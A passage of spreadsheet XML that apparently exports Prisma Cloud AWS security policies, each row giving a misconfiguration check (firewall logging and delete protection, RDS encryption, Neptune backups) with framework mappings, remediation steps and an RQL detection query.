          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-neptune-db-cluster' AND json.rule = Status equals "available" and (BackupRetentionPeriod does not exist or BackupRetentionPeriod less than 7)
{"category":"General","resourceTypes":["aws_neptune_cluster"]}</t>
        </is>
      </c>
      <c r="AA2039" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2039" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2039" t="inlineStr">
        <is>
          <t>PC-AWS-NEP-1165-CKV_AWS_361</t>
        </is>
      </c>
      <c r="AD2039" t="b">
        <v>1</v>
      </c>
      <c r="AE2039" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2039" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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39" t="inlineStr">
        <is>
          <t>349233fb-7d41-42b4-8058-90538b2964fb</t>
        </is>
      </c>
      <c r="AI2039" t="inlineStr">
        <is>
          <t>dccd9e6f-c6c0-41d7-a0af-18b6ff1bf227</t>
        </is>
      </c>
      <c r="AJ2039" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2039" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2040">
      <c r="A2040" t="inlineStr">
        <is>
          <t>SOC 2, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise</t>
        </is>
      </c>
      <c r="B2040" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2040" s="2" t="inlineStr"/>
      <c r="D2040" t="inlineStr"/>
      <c r="E2040" t="inlineStr"/>
      <c r="F2040" t="inlineStr"/>
      <c r="G2040" t="b">
        <v>1</v>
      </c>
      <c r="H20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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2040" t="inlineStr">
        <is>
          <t>aws-networkfirewall</t>
        </is>
      </c>
      <c r="K2040" t="inlineStr">
        <is>
          <t>AWS Network Firewall delete protection is disabled</t>
        </is>
      </c>
      <c r="L2040" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2040" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2040" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2040" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2040" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2040" t="inlineStr">
        <is>
          <t>TA0005</t>
        </is>
      </c>
      <c r="R2040" t="inlineStr">
        <is>
          <t>T1578.003 - Modify Cloud Compute Infrastructure: Delete Cloud Instance (TA0005)</t>
        </is>
      </c>
      <c r="S2040" t="inlineStr"/>
      <c r="T2040" t="b">
        <v>0</v>
      </c>
      <c r="U2040" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2040" t="inlineStr">
        <is>
          <t>aws-networkfirewall-firewall</t>
        </is>
      </c>
      <c r="W2040" t="inlineStr">
        <is>
          <t>This policy identifies the AWS Network Firewall for which delete protection is disabled.
AWS Network Firewall manages inbound and outbound traffic for the AWS resources within Virtual Private Clouds (VPCs). The deletion protection setting protects against accidental deletion of the firewall. Deletion of a firewall increases the risk of unauthorized access, data breaches, and compliance issues. 
It is recommended to enable deletion protection for a network firewall to safeguard against accidental deletion.</t>
        </is>
      </c>
      <c r="X2040" t="inlineStr">
        <is>
          <t>To enable delete protection on an AWS Network Firewall, perform the following actions:
1. Log into the AWS console
2. Select the specific region from the drop-down in the top right corner for which the alert is generated
3. Navigate to VPC Dashboard
4. In the navigation pane, Under 'Network Firewall', choose 'Firewalls'
5. On the Firewalls page, select the reported firewall
6. In the 'Firewall details' tab, under the 'Change protections' section, click on 'Edit'
7. In the pop-up window, choose the 'Enable' checkbox under the 'Delete protection' option
8. Click on 'Save' to save the changes</t>
        </is>
      </c>
      <c r="Y2040" t="inlineStr"/>
      <c r="Z2040" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-networkfirewall-firewall' AND json.rule = FirewallStatus.Status equals READY and Firewall.DeleteProtection is false</t>
        </is>
      </c>
      <c r="AA2040" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2040" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2040" t="inlineStr">
        <is>
          <t>PC-AWS-NFL-1159</t>
        </is>
      </c>
      <c r="AD2040" t="b">
        <v>1</v>
      </c>
      <c r="AE2040" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2040" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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0" t="inlineStr">
        <is>
          <t>4393c330-78ab-46d5-9df9-c1a21aaffd4b</t>
        </is>
      </c>
      <c r="AI2040" t="inlineStr">
        <is>
          <t>d2479335-43a8-4ad2-b1ec-a62a898ef7e8</t>
        </is>
      </c>
      <c r="AJ2040" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2040" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2041">
      <c r="A2041" t="inlineStr"/>
      <c r="B2041" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2041" s="2" t="inlineStr"/>
      <c r="D2041" t="inlineStr"/>
      <c r="E2041" t="inlineStr"/>
      <c r="F2041" t="inlineStr"/>
      <c r="G2041" t="b">
        <v>1</v>
      </c>
      <c r="H20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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2041" t="inlineStr">
        <is>
          <t>aws-networkfirewall</t>
        </is>
      </c>
      <c r="K2041" t="inlineStr">
        <is>
          <t>AWS Network Firewall is not configured with logging configuration</t>
        </is>
      </c>
      <c r="L2041" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2041" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2041" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2041" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2041" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2041" t="inlineStr"/>
      <c r="R2041" t="inlineStr"/>
      <c r="S2041" t="inlineStr"/>
      <c r="T2041" t="b">
        <v>0</v>
      </c>
      <c r="U2041" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2041" t="inlineStr">
        <is>
          <t>aws-networkfirewall-firewall</t>
        </is>
      </c>
      <c r="W2041" t="inlineStr">
        <is>
          <t>This policy identifies an AWS Network Firewall where logging is not configured.
AWS Network Firewall manages inbound and outbound traffic for the AWS resources within the AWS environment. Logging configuration for the network firewall involves enabling logging of network traffic, including allowed and denied requests, to provide visibility into network activity. Failure to configure logging results in a lack of visibility into potential security threats, making it difficult to detect and respond to malicious activity effectively and hindering threat detection and compliance.
It is recommended to enable logging to ensure comprehensive monitoring, threat detection, compliance adherence, and effective incident response.</t>
        </is>
      </c>
      <c r="X2041" t="inlineStr">
        <is>
          <t>To update a firewall's logging configuration through the console, Perform the following actions:
1. Sign in to the AWS Management Console
2. Select the specific region from the region drop-down in the top right corner, for which the alert is generated
3. Navigate to the VPC Dashboard
4. In the navigation pane, Under 'Network Firewall', choose 'Firewalls'
5. On the Firewalls page, select the reported firewall
6. In the 'Firewall details' tab, under the 'Logging' section, click on 'Edit'
5. Select the Log type as needed for your requirement. You can configure logging for alert and flow logs.
Alert – Sends logs for traffic that matches any stateful rule whose action is set to Alert or Drop. For more information about stateful rules and rule groups, see Rule groups in AWS Network Firewall.
Flow – Sends logs for all network traffic that the stateless engine forwards to the stateful rules engine.
6. For each selected log type, choose the destination type, then provide the information for the logging destination that you prepared following the guidance in Firewall logging destinations.
7. Choose 'Save' to save your changes and return to the firewall's detail page. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-2-63
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-logging-policies/bc-aws-2-63</t>
        </is>
      </c>
      <c r="Y2041" t="inlineStr"/>
      <c r="Z2041" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-networkfirewall-firewall' AND json.rule = FirewallStatus.Status equals "READY" as X; config from cloud.resource where api.name = 'aws-network-firewall-logging-configuration' AND json.rule = LoggingConfiguration.LogDestinationConfigs[*].LogType does not exist as Y; filter '$.X.Firewall.FirewallArn equal ignore case $.Y.FirewallArn' ; show X;
{"category":"Logging","resourceTypes":["aws_networkfirewall_firewall"]}</t>
        </is>
      </c>
      <c r="AA2041" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2041" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2041" t="inlineStr">
        <is>
          <t>PC-AWS-NFL-1181-CKV2_AWS_63</t>
        </is>
      </c>
      <c r="AD2041" t="b">
        <v>1</v>
      </c>
      <c r="AE2041" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2041" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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1" t="inlineStr">
        <is>
          <t>126f8616-26bd-4601-bed7-0099342c8621</t>
        </is>
      </c>
      <c r="AI2041" t="inlineStr">
        <is>
          <t>c18a0d30-ea02-4799-9a4c-be46ba992f0e</t>
        </is>
      </c>
      <c r="AJ2041" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2041" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2042">
      <c r="A2042" t="inlineStr">
        <is>
          <t>CIS v1.5.0 (AWS) - Level 2</t>
        </is>
      </c>
      <c r="B2042" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2042" s="2" t="inlineStr"/>
      <c r="D2042" t="inlineStr"/>
      <c r="E2042" t="inlineStr"/>
      <c r="F2042" t="inlineStr"/>
      <c r="G2042" t="b">
        <v>1</v>
      </c>
      <c r="H20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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2042" t="inlineStr">
        <is>
          <t>aws-organizations</t>
        </is>
      </c>
      <c r="K2042" t="inlineStr">
        <is>
          <t>policy test for Bell CA</t>
        </is>
      </c>
      <c r="L2042" t="inlineStr"/>
      <c r="M2042" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2042" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2042" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2042" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2042" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="R2042" t="inlineStr">
        <is>
          <t>5.5</t>
        </is>
      </c>
      <c r="S2042" t="inlineStr">
        <is>
          <t>Network,Bell</t>
        </is>
      </c>
      <c r="T2042" t="b">
        <v>0</v>
      </c>
      <c r="U2042" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2042" t="inlineStr">
        <is>
          <t>aws-organizations-account</t>
        </is>
      </c>
      <c r="W2042" t="inlineStr"/>
      <c r="X2042" t="inlineStr"/>
      <c r="Y2042" t="inlineStr"/>
      <c r="Z2042" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-organizations-account' AND json.rule = tags[?any( key equals owner and value equals "oomotayo" )]exists as X; config from cloud.resource where api.name= 'aws-ec2-describe-security-groups' AND json.rule = ipPermissions[?any(ipRanges[*] contains 0.0.0.0/0 )] exists as Y; filter '$.X.id contains $.Y.ownerId'; show Y;</t>
        </is>
      </c>
      <c r="AA2042" t="inlineStr">
        <is>
          <t>Oluranti Omotayo</t>
        </is>
      </c>
      <c r="AB2042" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2042" t="inlineStr"/>
      <c r="AD2042" t="b">
        <v>0</v>
      </c>
      <c r="AE2042" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2042" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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2" t="inlineStr">
        <is>
          <t>15405347-ecc9-4f12-bdab-657d84c4329d</t>
        </is>
      </c>
      <c r="AI2042" t="inlineStr">
        <is>
          <t>f3a74b77-1865-4ebe-9c61-320a3f6d70be</t>
        </is>
      </c>
      <c r="AJ2042" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2042" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2043">
      <c r="A2043" t="inlineStr"/>
      <c r="B2043" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2043" s="2" t="inlineStr"/>
      <c r="D2043" t="inlineStr"/>
      <c r="E2043" t="inlineStr"/>
      <c r="F2043" t="inlineStr"/>
      <c r="G2043" t="b">
        <v>0</v>
      </c>
      <c r="H20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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2043" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K2043" t="inlineStr">
        <is>
          <t>rds-cluster-parameter-test</t>
        </is>
      </c>
      <c r="L2043" t="inlineStr"/>
      <c r="M2043" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2043" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2043" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2043" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2043" t="inlineStr"/>
      <c r="R2043" t="inlineStr"/>
      <c r="S2043" t="inlineStr"/>
      <c r="T2043" t="b">
        <v>0</v>
      </c>
      <c r="U2043" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2043" t="inlineStr">
        <is>
          <t>aws-rds-db-cluster</t>
        </is>
      </c>
      <c r="W2043" t="inlineStr"/>
      <c r="X2043" t="inlineStr"/>
      <c r="Y2043" t="inlineStr"/>
      <c r="Z2043" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-rds-db-cluster' and json.rule= engine equals "mysql" or engine equals "aurora-mysql" as X; config from cloud.resource where api.name = 'aws-rds-db-cluster-parameter-group' as Y; filter '($.X.dBclusterParameterGroupArn equals $.Y.DBClusterParameterGroupArn) and ($.Y.parameters.general_log.ParameterValue does not equal "1" or ($.X.enabledCloudwatchLogsExports[*] does not contain "audit" or $.X.enabledCloudwatchLogsExports[*] does not contain "error" or $.X.enabledCloudwatchLogsExports[*] does not contain "general"))' ;show X;</t>
        </is>
      </c>
      <c r="AA2043" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2043" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2043" t="inlineStr"/>
      <c r="AD2043" t="b">
        <v>0</v>
      </c>
      <c r="AE2043" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2043" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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3" t="inlineStr">
        <is>
          <t>affeb443-e181-4285-8bb5-fd73a024dc65</t>
        </is>
      </c>
      <c r="AI2043" t="inlineStr">
        <is>
          <t>a17adae2-e433-488f-a6da-bb69e2524414</t>
        </is>
      </c>
      <c r="AJ2043" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2043" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2044">
      <c r="A2044" t="inlineStr"/>
      <c r="B2044" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2044" s="2" t="inlineStr"/>
      <c r="D2044" t="inlineStr"/>
      <c r="E2044" t="inlineStr"/>
      <c r="F2044" t="inlineStr"/>
      <c r="G2044" t="b">
        <v>0</v>
      </c>
      <c r="H20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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2044" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K2044" t="inlineStr">
        <is>
          <t>test rds join</t>
        </is>
      </c>
      <c r="L2044" t="inlineStr"/>
      <c r="M2044" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2044" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2044" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2044" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2044" t="inlineStr"/>
      <c r="R2044" t="inlineStr"/>
      <c r="S2044" t="inlineStr"/>
      <c r="T2044" t="b">
        <v>0</v>
      </c>
      <c r="U2044" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2044" t="inlineStr">
        <is>
          <t>aws-rds-db-cluster</t>
        </is>
      </c>
      <c r="W2044" t="inlineStr"/>
      <c r="X2044" t="inlineStr"/>
      <c r="Y2044" t="inlineStr"/>
      <c r="Z2044" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-rds-db-cluster' and json.rule= engine equals "mysql" or engine equals "aurora-mysql" as X; config from cloud.resource where api.name = 'aws-rds-db-cluster-parameter-group' as Y; filter '($.X.dBclusterParameterGroupArn equals $.Y.DBClusterParameterGroupArn) and ($.Y.parameters.general_log.ParameterValue does not equal "1" or ($.X.enabledCloudwatchLogsExports[*] does not contain "audit" or $.X.enabledCloudwatchLogsExports[*] does not contain "error" or $.X.enabledCloudwatchLogsExports[*] does not contain "general"))' ;show X;</t>
        </is>
      </c>
      <c r="AA2044" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2044" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2044" t="inlineStr"/>
      <c r="AD2044" t="b">
        <v>0</v>
      </c>
      <c r="AE2044" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2044" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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4" t="inlineStr">
        <is>
          <t>0befaac4-ab8f-4732-b027-7de31adb75b3</t>
        </is>
      </c>
      <c r="AI2044" t="inlineStr">
        <is>
          <t>f83dba2b-c05c-4016-8465-61d761697f42</t>
        </is>
      </c>
      <c r="AJ2044" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2044" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2045">
      <c r="A2045" t="inlineStr">
        <is>
          <t>CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2024.2, CSA CCM v4.0.12, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, GDPR, ISO 27002:2022, CSA CCM v.4.0.6, APRA (CPS 234) Information Security, NIST SP 800-172, FFIEC, ISO/IEC 27001:2022, CHC HITRUST CSF v.9.6.0, CIS Controls v8, Risk Management in Technology (RMiT), CIS Controls v8.1, CIS Controls v7.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, HITRUST v.9.4.2 [Deprecated], SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, MLPS 2.0 (Level 2), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ISO/IEC 27002:2013, NIST 800-53 Rev 5, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), FFIEC, HITRUST CSF v.11.2.0, RBI Baseline Cyber Security and Resilience Requirements, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Fedramp (Moderate), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, HITRUST CSF v.9.6.0, CRI Profile v1.2.1, Secure Controls Framework (SCF) - 2022.2.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST CSF v2.0, Copy of CIS Controls v8, NIST 800-53 Rev 5, FFIEC, NIST 800-53 Rev4, HITRUST v.9.4.2 [Deprecated], jneytchev-fedramp-low, Fedramp (Low), ISO/IEC 27017:2015, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, GDPR, Microsoft Cloud Security Benchmark v1, PCI DSS v4.0, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, NIST 800-53 Rev4, NIST CSF v2.0, Telecommunications Security Act - TSA, CDC NIST 800-53 Rev4, NIST 800-53 Rev4, ISO/IEC 27018:2019, CRI Profile v2.0, MAS TRM 2021, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27017:2015, DORA, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, NIST CSF, TX-RAMP Level 1, NIST SP 800-171 Revision 3, SOC 2, NIST CSF, ACSC Information Security Manual (ISM), Fedramp (Moderate), Risk Management in Technology (RMiT), ISO/IEC 27002:2013, ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, APRA (CPS 234) Information Security, MAS TRM 2021, ISO/IEC 27002:2013, CRI Profile v2.0, CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2024.2, CRI Profile v1.2.1, NIST SP 800-171 Revision 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, PCI DSS v3.2.1, NIST 800-53 Rev 5, kfirdaus AWS Account-CS</t>
        </is>
      </c>
      <c r="B2045" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2045" s="2" t="inlineStr"/>
      <c r="D2045" t="inlineStr"/>
      <c r="E2045" t="inlineStr"/>
      <c r="F2045" t="inlineStr"/>
      <c r="G2045" t="b">
        <v>1</v>
      </c>
      <c r="H20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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2045" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K2045" t="inlineStr">
        <is>
          <t>AWS RDS DB cluster is encrypted using default KMS key instead of CMK</t>
        </is>
      </c>
      <c r="L2045" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2045" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2045" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2045" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2045" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2045" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R2045" t="inlineStr">
        <is>
          <t>ISM-0459</t>
        </is>
      </c>
      <c r="S2045" t="inlineStr"/>
      <c r="T2045" t="b">
        <v>0</v>
      </c>
      <c r="U2045" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2045" t="inlineStr">
        <is>
          <t>aws-rds-db-cluster</t>
        </is>
      </c>
      <c r="W2045" t="inlineStr">
        <is>
          <t>This policy identifies RDS DB(Relational Database Service Database) clusters which are encrypted using default KMS key instead of CMK (Customer Master Key). As a security best practice CMK should be used instead of default KMS key for encryption to gain the ability to rotate the key according to your own policies, delete the key, and control access to the key via KMS policies and IAM policies.</t>
        </is>
      </c>
      <c r="X2045" t="inlineStr">
        <is>
          <t>RDS DB clusters can be encrypted only while creating the database cluster. You can't convert an unencrypted DB cluster to an encrypted one. However, you can restore an unencrypted Aurora DB cluster snapshot to an encrypted Aurora DB cluster. To do this, specify a KMS encryption key when you restore from the unencrypted DB cluster snapshot.
Step 1: To create a 'Snapshot' of the unencrypted DB cluster,
https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/USER_CreateSnapshotCluster.html
NOTE: As you can't restore from a DB cluster snapshot to an existing DB cluster; a new DB cluster is created when you restore. Once the Snapshot status is 'Available'.
Step 2: Follow the below link to restoring the Cluster from a DB Cluster Snapshot,
https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/USER_RestoreFromSnapshot.html
Once the DB cluster is restored and verified, follow below steps to delete the reported DB cluster,
1. Log in to the AWS Management Console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated.
3. Navigate to 'RDS' dashboard from 'Services' dropdown
4. In the navigation pane, choose ‘Databases’
5. In the list of DB instances, choose a writer instance for the DB cluster
6. Choose 'Actions', and then choose 'Delete'
FMI:
1. While deleting a RDS DB cluster, customer has to disable 'Enable deletion protection' otherwise instance cannot be deleted
2. While deleting RDS DB instance , AWS application will ask the end user to take Final snapshot
3. If a RDS DB cluster has a writer role instance, then User has to delete the write instance to delete the main cluster (Delete option won’t be enabled for main RDS DB cluster) 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-327
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-327</t>
        </is>
      </c>
      <c r="Y2045" t="inlineStr"/>
      <c r="Z2045" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-rds-db-cluster' as X; config from cloud.resource where api.name = 'aws-kms-get-key-rotation-status' as Y; filter '($.X.storageEncrypted is true) and ($.X.kmsKeyId equals $.Y.key.keyArn) and ($.Y.keyMetadata.keyManager does not contain CUSTOMER)' ; show X;
{"category":"General","resourceTypes":["aws_rds_cluster"]}</t>
        </is>
      </c>
      <c r="AA2045" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2045" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2045" t="inlineStr">
        <is>
          <t>PC-AWS-RDS-500-CKV_AWS_327</t>
        </is>
      </c>
      <c r="AD2045" t="b">
        <v>1</v>
      </c>
      <c r="AE2045" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2045" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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5" t="inlineStr">
        <is>
          <t>668068f4-3950-4acd-a565-b550095d6e22</t>
        </is>
      </c>
      <c r="AI2045" t="inlineStr">
        <is>
          <t>bbd7ca6b-c899-4edf-9e92-f5262ce8311d</t>
        </is>
      </c>
      <c r="AJ2045" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2045" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2046">
      <c r="A2046" t="inlineStr">
        <is>
          <t>HIPAA, ISO/IEC 27001:2022, Insurance Regulatory And Development Authority Of India, ISO/IEC 27001:2022, NYDFS 23 CRR-NY 500.0, NIST SP 800-171 Revision 3, ITSG-33, HITRUST CSF v.11.2.0, SOC 2, SOC 2, Microsoft Cloud Security Benchmark v1, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2046" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2046" s="2" t="inlineStr"/>
      <c r="D2046" t="inlineStr"/>
      <c r="E2046" t="inlineStr"/>
      <c r="F2046" t="inlineStr"/>
      <c r="G2046" t="b">
        <v>1</v>
      </c>
      <c r="H20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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2046" t="inlineStr">
        <is>
          <t>aws-rds</t>
        </is>
      </c>
      <c r="K2046" t="inlineStr">
        <is>
          <t>AWS RDS cluster encryption in transit is not configured</t>
        </is>
      </c>
      <c r="L2046" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2046" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2046" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2046" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2046" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2046" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2046" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
